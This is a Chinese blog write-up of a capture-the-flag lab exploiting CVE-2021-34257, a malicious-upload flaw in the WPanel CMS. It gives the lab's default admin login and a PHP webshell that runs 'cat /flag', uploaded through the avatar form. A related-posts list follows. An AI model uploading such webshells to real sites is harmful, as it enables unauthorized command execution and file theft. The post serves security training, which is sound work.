【春秋云境】CVE-2021-34257靶场记录

最新推荐文章于 2024-05-28 16:23:36 发布
最新推荐文章于 2024-05-28 16:23:36 发布
阅读量887 收藏 1
点赞数 1
分类专栏: 春秋云镜 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78019493/article/details/130771025
版权

靶场介绍

WPanel是一个用于构建博客、网站和网络应用程序的CMS。 WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传

开启靶场

来到后台;账号:admin@admin.com  密码:admin

 权限马如下:

<?php

system('cat /flag');

phpinfo();

?>

解题步骤

构造权限马,在头像上传处上传

 上传成功后复制地址到新标签页打开获取flag

在人间凑日子
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
春秋CVE-2021-34257
qq_22002773的博客
07-31 134
春秋CVE-2021-34257
春秋镜:CVE-2021-34257
comingsoooooon的博客
04-23 200
WPanel是一个用于构建博客、网站和网络应用程序的CMS。WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传。2、第二步,点击Manage my profile,修改头像,上传头像文件,直接上传shell文件即可,然后保存,返回头像界面。3、右键点击头像,新标签页打开头像链接即为shell文件,执行cat /flag。账号/密码:admin@admin.com/admin。1、第一步:登录后台。
CVE-2022-30887漏洞复现
weixin_45177807的博客
11-06 2193
CVE-2022-30887漏洞复现
春秋CVE-2022-23906靶场WP和CVE-2022-23880靶场WP
果粒程
12-03 671
春秋CVE-2022-23906靶场WP和CVE-2022-23880靶场WP
春秋CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
果粒程
12-05 953
春秋CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
春秋 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
春秋CVE-2022-22733靶场WP
果粒程
12-07 1446
春秋CVE-2022-22733靶场WP
WP-春秋-Brute4Road靶场通关完全指南
qq_45234543的博客
12-30 2538
春秋-Brute4Road靶场通关指南,完全通关指南手把手教学
春秋CVE-2022-25099靶场WP和CVE-2022-24663靶场WP
果粒程
12-01 675
春秋CVE-2022-25099靶场WP和CVE-2022-24663靶场WP
春秋Exchange WP
m0_62466350的博客
12-30 939
Exchange 是一套难度为中等的靶场,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环核心认证机制的理解,以及掌握域环渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。*注意:该靶场只有4个flag,如果提交完4个flag后仍未攻克成功,请关闭环提交反馈。
春秋CVE-2022-24263靶场WP和CVE-2022-24223靶场WP
果粒程
12-01 447
春秋CVE-2022-24263靶场WP和CVE-2022-24223靶场WP
WP-春秋-Unauthorized靶场完全通关指南
qq_45234543的博客
11-23 1357
Unauthorized靶场完全通关指南,手把手教学拿到3个flag
春秋CVE-2022-22963靶场WP和CVE-2022-22909靶场WP
果粒程
12-06 1406
春秋CVE-2022-22963靶场WP和CVE-2022-22909靶场WP
WEB安全:Content Security Policy (CSP) 详解
最新发布
_midnight的博客
05-28 1139
跨站脚本攻击 (XSS) 是一种常见的安全漏洞,攻击者通过注入恶意脚本来劫持用户会话、破坏网站内容或进行钓鱼攻击。存储型 XSS:恶意脚本被永久存储在目标服务器上(如数据库),并在用户访问时执行。反射型 XSS:恶意脚本通过 URL 参数或表单提交传递,并在服务器响应中反射给用户。DOM 型 XSS:恶意脚本通过修改客户端的 DOM 结构直接在浏览器中执行。
web安全渗透测试十大常规项(二):web渗透测试之XSS跨站脚本攻击
HACKONE的博客
05-26 232
渗透测试之XSS跨站脚本攻击XSS跨站脚本攻击 XSS跨站脚本攻击
春秋CVE-2022-29464
09-05
- *2* [春秋靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值